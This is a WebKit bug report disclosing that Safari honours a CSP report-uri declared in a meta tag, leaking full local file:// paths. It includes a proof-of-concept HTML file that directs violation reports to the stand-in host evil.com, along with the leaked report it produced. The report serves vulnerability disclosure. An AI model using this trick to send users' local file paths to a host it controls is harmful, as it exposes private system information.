Bug 158263 - CSP: report-uri is honored even if CSP is served via <meta> tag, leaking full file:// paths as document-uri
Summary: CSP: report-uri is honored even if CSP is served via <meta> tag, leaking full...
Status: RESOLVED DUPLICATE of bug 154307
Alias: None
Product: WebKit
Classification: Unclassified
Component: WebCore Misc. (show other bugs)
Version: WebKit Local Build
Hardware: Unspecified OS X 10.11
: P2 Normal
Assignee: Nobody
URL:
Keywords:
Depends on:
Blocks:
 
Reported: 2016-06-01 09:03 PDT by Michele Spagnuolo
Modified: 2016-06-01 20:24 PDT (History)
3 users (show)

See Also:


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Michele Spagnuolo 2016-06-01 09:03:39 PDT
Safari leaks the full file:// path in document-uri if a report-uri is in a CSP served via <meta> tag, even if the specification explicitly prohibits to honor report-uri if the policy is served via <meta> tag[1].

PoC:

report-uri.html
----------------

<!DOCTYPE html>
<html>
  <head>
    <meta http-equiv="Content-Security-Policy" content="img-src 'none'; report-uri https://evil.com/csp">
    <title>CSP report-uri demo</title>
  </head>
  <body>
    <img src="cat.jpg" alt="A nice cat">
  </body>
</html>

This is the report sent to a remote report-uri:

{"csp-report":{"document-uri":"file:///Users/mikispag/CSP/report-uri.html","referrer":"","violated-directive":"img-src 'none'","original-policy":"img-src 'none'; report-uri https://evil.com/csp","blocked-uri":"file"}}

[1] https://www.w3.org/TR/CSP2/#directive-report-uri
Comment 1 Daniel Bates 2016-06-01 20:18:44 PDT

*** This bug has been marked as a duplicate of bug 154307 ***
Comment 2 Daniel Bates 2016-06-01 20:24:24 PDT
Out of curiosity, what version of Safari are you using? You can find the version of Safari in Safari > About Safari.